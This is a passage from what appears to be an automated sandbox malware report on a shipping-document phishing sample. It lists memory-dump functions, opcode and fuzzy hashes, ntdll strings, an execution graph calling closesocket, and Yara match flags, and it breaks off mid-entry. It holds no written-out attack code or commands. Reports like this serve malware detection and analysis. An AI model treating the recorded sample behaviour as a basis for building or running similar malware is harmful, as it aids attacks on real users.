                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a69c7372dd78b928aee5d31cef27a3833dc27c90b9780fed08f1bc2f66463bc
                • Instruction ID: 76f80ab457bb6636cbc7b863d25ca0ad04b6803d051b63eb7d6452e3bde8309d
                • Opcode Fuzzy Hash: 8a69c7372dd78b928aee5d31cef27a3833dc27c90b9780fed08f1bc2f66463bc
                • Instruction Fuzzy Hash: FB90022230140402D246725944147060009D7D1345F95C052F5424556DC7258A53A632
                Function 01B43090 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 163dce6dd38e2bbe033060fd5f1bb793e9bd6524a46d18a1077d8a92f1ce9dee
                • Instruction ID: dd8eb38d41f9ec87b2a35e8d6acfcc37069150832580c80ac68ab5f29cc5b27c
                • Opcode Fuzzy Hash: 163dce6dd38e2bbe033060fd5f1bb793e9bd6524a46d18a1077d8a92f1ce9dee
                • Instruction Fuzzy Hash: 0E90022224140802D284725984147070006D7D0601F55C051B4024555DC7168A656BB1
                Function 01B43010 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eadd22bf6cb660cdf34b5248e187d2e335ced30f2476fcf18dd28da0369d819c
                • Instruction ID: d858beaedcf1ca850d185d6fff45ae2e4c65e117d66d805651363d226319c09e
                • Opcode Fuzzy Hash: eadd22bf6cb660cdf34b5248e187d2e335ced30f2476fcf18dd28da0369d819c
                • Instruction Fuzzy Hash: 4490022220184442D28473594804B0F410597E1202F95C059B8156555CCA1589555B21
                Function 01B439B0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c93677e85dc62e3ff784f1e0ddddb9bdbb0252a2d7ef7835246a5939fcdde7fc
                • Instruction ID: 81cbef462a6c05fbb70981f8528c88c366b878303d93425a5031bb32715e63d5
                • Opcode Fuzzy Hash: c93677e85dc62e3ff784f1e0ddddb9bdbb0252a2d7ef7835246a5939fcdde7fc
                • Instruction Fuzzy Hash: 0B90022224545102D294725D44047164005B7E0201F55C061B4814595DC65589556721
                Function 01B43D10 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10f613ee041d0f085d07c56bc6f7c12b0b914b81a8956e53452f4cb8d35b0f1a
                • Instruction ID: 20964afcc76afe556c9addd7f8424d11a5d5d788aabe8b6b1171fc073d75bddd
                • Opcode Fuzzy Hash: 10f613ee041d0f085d07c56bc6f7c12b0b914b81a8956e53452f4cb8d35b0f1a
                • Instruction Fuzzy Hash: 8690023220240142968473595804B4E410597E1302B95D455B4015555CCA1489615721
                Function 01B43D70 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa57b659d381a53ccd4d07d546f0736e89c56db03e011f1c1f4808eea646a4b6
                • Instruction ID: dcf24c892999adbd624567d2709c77bb3759e2c6380beb21e3ea90051a4816bf
                • Opcode Fuzzy Hash: fa57b659d381a53ccd4d07d546f0736e89c56db03e011f1c1f4808eea646a4b6
                • Instruction Fuzzy Hash: E990023620140402D65472595804746004697D0301F55D451B4424559DC75489A1A621
                Function 01B42C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 4d13e486dc2bd990de5e3d63ff7ffa620d061ba184aadb7f8f3fc952e16730a2
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                Function 01B42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 01afa993284d20a85fc68ea295a61d2d5f07c4a621a7ea70d9c13bb1148ef31f
                • Instruction ID: c643fc28bacd0ac04c0143d8bfa937704898d0efd9a105d98029d1d3b0a2be4c
                • Opcode Fuzzy Hash: 01afa993284d20a85fc68ea295a61d2d5f07c4a621a7ea70d9c13bb1148ef31f
                • Instruction Fuzzy Hash: BB51B3A6A00116BFDF19DBAC989097EFBB8FF48240714C2E9F565D7642D334DE40A7A0
                Function 01BB2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 8bacc9b2e67e5e83903712810578d954d02028f4787ebb9211f31c3b51c0a46e
                • Instruction ID: e4c853d8ded35976c4f1721bf023311dcb21d09a01443e3be88fd2a7fe3ad15d
                • Opcode Fuzzy Hash: 8bacc9b2e67e5e83903712810578d954d02028f4787ebb9211f31c3b51c0a46e
                • Instruction Fuzzy Hash: EA51D475A00645AEDF29DF9CC8D09BFBBB8EF44200B0485D9F596D7A41E7B8EA40C760
                Function 01B37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B74787
                • ExecuteOptions, xrefs: 01B746A0
                • Execute=1, xrefs: 01B74713
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B746FC
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B74742
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B74725
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B74655
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 672ded435d8c800b0915ebfac46155eb129c3505fce21928462876dbde135848
                • Instruction ID: cbcd065598bf876a5a1636f0c28434d0283e4d6463d357e17e17c13dea08252a
                • Opcode Fuzzy Hash: 672ded435d8c800b0915ebfac46155eb129c3505fce21928462876dbde135848
                • Instruction Fuzzy Hash: E95138B160021ABBEF29ABA8DC99FB977A8EF54300F0400EDE605A7181DB719A55DF50
                Function 01BD6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: ea3587c3405e738853d33ca0fac2c501efc1b0f03fbbfbdb3c1c3ad2edb54046
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: A3021771508342AFD70DCF19C490A6BBBE5EFC8704F448AADF9898B254EB31E945CB52
                Function 01B4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 2e7df6340701aa5ee184e9e4e6a11225916113b16cd9d9a59ffd046de3c895a8
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 6D81A170A052499FEF2DCF6CC6517BEBBB2EF45320F18C299EA51A7291C734D840AB51
                Function 01BB20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: ea337a0447258d2b5b223e923f5855b27c3aa0ec8fb704d1b0e9317aa2ec5fa3
                • Instruction ID: 573ba50b761982f1c9a8c6dd55ab4905216b2e1a46dc5923a6ecd60c7a949a86
                • Opcode Fuzzy Hash: ea337a0447258d2b5b223e923f5855b27c3aa0ec8fb704d1b0e9317aa2ec5fa3
                • Instruction Fuzzy Hash: 0D21677AA00119ABDB14DF7ADC81AFE7BF8EF54640F040199EA05D3600E770E9029791
                Function 01B2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B702E7
                • RTL: Re-Waiting, xrefs: 01B7031E
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B702BD
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 128e7ab47449c425b05812ada928ff077b3ff605284bb85702ab608b4bdcb4df
                • Instruction ID: 0edf7fbc50532fadda0986d45a1bf53203d2116341abc02ffd49918669349e09
                • Opcode Fuzzy Hash: 128e7ab47449c425b05812ada928ff077b3ff605284bb85702ab608b4bdcb4df
                • Instruction Fuzzy Hash: C6E1BF316047519FDB29DF28C884B2ABBF0FB49714F144A9EF5A98B2E1D774D848CB42
                Function 01B3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Resource at %p, xrefs: 01B77B8E
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B77B7F
                • RTL: Re-Waiting, xrefs: 01B77BAC
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: aec045de3dbb396a608d1c6fcbeb42362a0ba73a7f113294543c5517fe937ecb
                • Instruction ID: cbd7d1a32ec2491ed12f0060d93be73f95ca5daa999d0542cb7a536dfe8b9073
                • Opcode Fuzzy Hash: aec045de3dbb396a608d1c6fcbeb42362a0ba73a7f113294543c5517fe937ecb
                • Instruction Fuzzy Hash: 0841D6313047029FDB29EE29C950B6AB7E5EF94710F100A9DFA5AD7780DB31E415CB91
                Function 01B3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B7728C
                Strings
                • RTL: Resource at %p, xrefs: 01B772A3
                • RTL: Re-Waiting, xrefs: 01B772C1
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B77294
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 2b70d4f6e5c4e208a49708921a916523dfc0bf2a5142dd8bbe4baa3eb23a9811
                • Instruction ID: fd65dd855822fa455444a059ab7e6221a636c53026f6461256894a8cf27816fd
                • Opcode Fuzzy Hash: 2b70d4f6e5c4e208a49708921a916523dfc0bf2a5142dd8bbe4baa3eb23a9811
                • Instruction Fuzzy Hash: F0411131700206ABDB29DE29CD45F6AB7A5FF95710F10069DF965EB280DB30E816CBD1
                Function 01BB2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: f3246c4d3d7f9ccbe66293f402ee158eedbc9594d00deba0c87ec4437deb474d
                • Instruction ID: 2a482be0a3b11b286de07df789e5e9d1bfeb84607242d27067ebe95e40996053
                • Opcode Fuzzy Hash: f3246c4d3d7f9ccbe66293f402ee158eedbc9594d00deba0c87ec4437deb474d
                • Instruction Fuzzy Hash: 98318472A012199FDB24DF29DCC0BFE77B8EF44610F4445D9E949E3600EB70AA458BA0
                Function 01B47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: 1727f62da5c6925de8dc403a4adaf1eb2c1045388148c8f44858c6a1af4d7197
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 0191C470E002569BDF2CDF6DC8806BEBBA5EF44320F14C69AE955A72C0DF309940E751
                Function 01B09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: 084f6f91f90d6b23cc5b82b200e09acbdbb32ca40b06f81720051c8b333c15c8
                • Instruction ID: 3e4382306f753b1be3b60a78b320a696f948868337b49a3d790359869cf07f5b
                • Opcode Fuzzy Hash: 084f6f91f90d6b23cc5b82b200e09acbdbb32ca40b06f81720051c8b333c15c8
                • Instruction Fuzzy Hash: 23810C71D012699BDB39DF54CC44BEABBB8AB18754F0041EAEA1DB7280D7745E84CFA0
                Function 01B8CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B8CFBD
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 534e086422c349b70f47e1f4f887a080612709574ab9b73da710f9dc5b7d0da4
                • Instruction ID: b82017b45417bdf4b2c3988329eb75e656a6b15903d3d3351657f2dbb7a51798
                • Opcode Fuzzy Hash: 534e086422c349b70f47e1f4f887a080612709574ab9b73da710f9dc5b7d0da4
                • Instruction Fuzzy Hash: 2441A371900215DFDB29AF99C850AADBBF8FF59B50F1041AEEA05EB264D730D805CB61

                Execution Graph

                Execution Coverage:3.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:3
                Total number of Limit Nodes:0
                execution_graph 16928 5fa6590 16929 5fa65ad 16928->16929 16930 5fa65bc closesocket 16929->16930

                Executed Functions

                Function 05FA6590 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 9 5fa6590-5fa65ca call 5f7e440 call 5fa7190 closesocket
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 05F20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5f20000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
                • API String ID: 2781271927-0
                • Opcode ID: f3f438e52cda2e60b4448464e067bedb86839187e72d7297fdab88595afdc008
                • Instruction ID: eaffe813605437ddebf27fb31fdf074dd2fd9c67e57230c0c90c60acedf23286
                • Opcode Fuzzy Hash: f3f438e52cda2e60b4448464e067bedb86839187e72d7297fdab88595afdc008
                • Instruction Fuzzy Hash: 5EE08C7A2006047BC610EB6ADC48EDB73ACDFC5325F004816FA08A7200CA75B91187F1
                Function 03455955 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                Download Yara Rule

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %
                • API String ID: 0-4029820466
                • Opcode ID: 5b9479dde624319e1e08d81779469a0bce8edde2446cea2bc471b51cc31f53ad
                • Instruction ID: 7d0a4b244c15bf942c4b2bdac172c0c4c483f18039073c8229d2d7d879aefe97
                • Opcode Fuzzy Hash: 5b9479dde624319e1e08d81779469a0bce8edde2446cea2bc471b51cc31f53ad
                • Instruction Fuzzy Hash: 362100B6D0121DAF8B00DFE9D8419EFB7F9EF88210F14815EE919EB240E7715A05CBA4
                Function 03448705 Relevance: .2, Instructions: 153COMMON
                Download Yara Rule

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b5da43597891f173b223090c103bbf4365950f658442bdd4fba291a6c46c971
                • Instruction ID: 61beadd1c48b07b3701aefb2756a628a75d432e86aee32f8b8d42c3b87883108
                • Opcode Fuzzy Hash: 6b5da43597891f173b223090c103bbf4365950f658442bdd4fba291a6c46c971
                • Instruction Fuzzy Hash: 985182B2D01218AEEB10DF95DC49EEEF378EF44610F1481AAED0C5F241E7715A548BA5
                Function 03434699 Relevance: .1, Instructions: 136COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 129 3434699-34346e2 131 34346e5-34346f7 call 3448665 129->131 134 3434715-343474e call 3458f65 131->134 135 34346f9-3434703 131->135 138 3434753-3434758 134->138 135->131 136 3434705-3434714 135->136 138->136 139 343475a-3434776 call 3458865 138->139 139->136 142 3434778-343479b call 3459045 139->142 142->136 145 34347a1-34347c4 call 3459045 142->145 145->136 148 34347ca-34347e8 145->148
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edcf0d0271025113baaea795c73b9f0d43d183883e838d2d3676fbac18034db1
                • Instruction ID: 361fd5fcdaf7e0576e269c87304ca7ea38500ad5917bffa23c54fb4107a0c6be
                • Opcode Fuzzy Hash: edcf0d0271025113baaea795c73b9f0d43d183883e838d2d3676fbac18034db1
                • Instruction Fuzzy Hash: 63411FB1D11219AFDB44CF9AC881AEEBBBCEF49750F10415AF914EB240E7B09641CBA4
                Function 03458F65 Relevance: .1, Instructions: 85COMMON
                Download Yara Rule

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1f65d1a7d7d2dfa115e99545d59fe304ede6543ec7f88a2dd1b3468b88450936
                • Instruction ID: 45e813783189c3c53ff99e34da1ae630735bcaf0d33e0511b8358c44048bad46
                • Opcode Fuzzy Hash: 1f65d1a7d7d2dfa115e99545d59fe304ede6543ec7f88a2dd1b3468b88450936
                • Instruction Fuzzy Hash: A731FEB5A00609AFDB14DF99DC81EEF77B8EF89710F10810AFD19A7240D770A811CBA5
                Function 034598C5 Relevance: .1, Instructions: 77COMMON
                Download Yara Rule

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a88480281ca516bfb922a1cbfe0b1d0245ace4c051b58db2ed8e92917f73c5d
                • Instruction ID: d4a07f6125dd0f59972c468e80c5b257f680d510890feef4787ae497e597aea1
                • Opcode Fuzzy Hash: 6a88480281ca516bfb922a1cbfe0b1d0245ace4c051b58db2ed8e92917f73c5d
                • Instruction Fuzzy Hash: 97212CB5A00309AFDB14DF99DC81EAF77B8EF89710F00810AFD189B280D770A911CBA5
                Function 03448545 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 283 3448545-344859b call 345b955 * 3 call 3459c35 292 34485a4-34485b9 call 3458e75 283->292 293 344859d-34485a3 283->293 292->293 296 34485bb-34485ce call 34598c5 292->296 298 34485d3-34485e3 296->298
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82315b029737e30e21c69ea86cdf60829a0ab49916ea63ee30603aa927e14094
                • Instruction ID: b5da1a3c835be51cad898e51971acc4487d09ba7b19f4736ec554a1980b92c02
                • Opcode Fuzzy Hash: 82315b029737e30e21c69ea86cdf60829a0ab49916ea63ee30603aa927e14094
                • Instruction Fuzzy Hash: A41173767803057AF720DE568C42FAB775CDF85B50F24401AFF08AE2C2D6A5B81146B8
                Function 03458BF5 Relevance: .1, Instructions: 65COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cec650279dd37b8927bbde3ee8410f7cb9340541da3f49edb11485a3c2b28f61
                • Instruction ID: 70a37120f25097ed83598c5e1629144faa8195e658a9411d803b7d434f897a0d
                • Opcode Fuzzy Hash: cec650279dd37b8927bbde3ee8410f7cb9340541da3f49edb11485a3c2b28f61
                • Instruction Fuzzy Hash: 9D114C75A00309BFE710EF95DC85FAB73A8EB89700F00850EF9185B280EB7569118BA9
                Function 03458D75 Relevance: .1, Instructions: 65COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3ba6e9a19ed65c52c5b2829d5cee06f8ee6571ddf3339ff605751da1ae104a34
                • Instruction ID: 774913d73dab9b77a5f965b93c2944dffc3e545a2f1395f8193a36edd63ade00
                • Opcode Fuzzy Hash: 3ba6e9a19ed65c52c5b2829d5cee06f8ee6571ddf3339ff605751da1ae104a34
